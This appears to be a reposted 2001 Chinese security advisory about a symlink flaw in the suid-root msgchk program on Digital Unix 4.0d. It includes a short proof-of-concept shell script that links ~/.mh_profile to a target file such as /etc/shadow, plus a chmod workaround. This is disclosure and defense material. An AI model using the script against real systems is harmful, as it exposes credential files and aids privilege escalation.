发布日期：2001-09-10
更新日期：2001-09-11

受影响系统：

Digital Unix 4.0d

描述：

---

Digital Unix 4.0d所带的msgchk程序缺省被设置了suid root属性。它存在一个符号链接
漏洞，本地攻击者可以利用这个漏洞获取任意文件的第一行内容。

msgchk在读取用户主目录下的.mh_profile文件时，没有检查其是不是一个链接文件，因此
如果攻击者设置一个指向某未授权文件(例如/etc/shadow)的链接，就可能获取该文件的
第一行内容。攻击者可能利用这个漏洞进一步提升权限。

根据目前的报告，只知道4.0d受影响，其他4.0x未经测试但也可能受影响。

<*来源：SeungHyun Seo (seo@igrus.inha.ac.kr)
  链接：http://archives.neohapsis.com/archives/bugtraq/2001-09/0064.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

SeungHyun Seo (seo@igrus.inha.ac.kr)提供了如下测试代码：

++ msgchkx.sh

#!/bin/sh
# truefinder, seo@igrus.inha.ac.kr
# msgchk file read vulnerability

if [ ! -f $1 ]
then
    echo "usage : $0 <file path>"
fi

cd ~
ln -sf $1 ~/.mh_profile
/usr/bin/mh/msgchk


建议：

---

临时解决方法：

去掉msgchk的suid root属性：
# chmod a-s /usr/bin/mh/msgchk

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.tru64unix.compaq.com/


浏览次数：3632
严重程度：0（网友投票）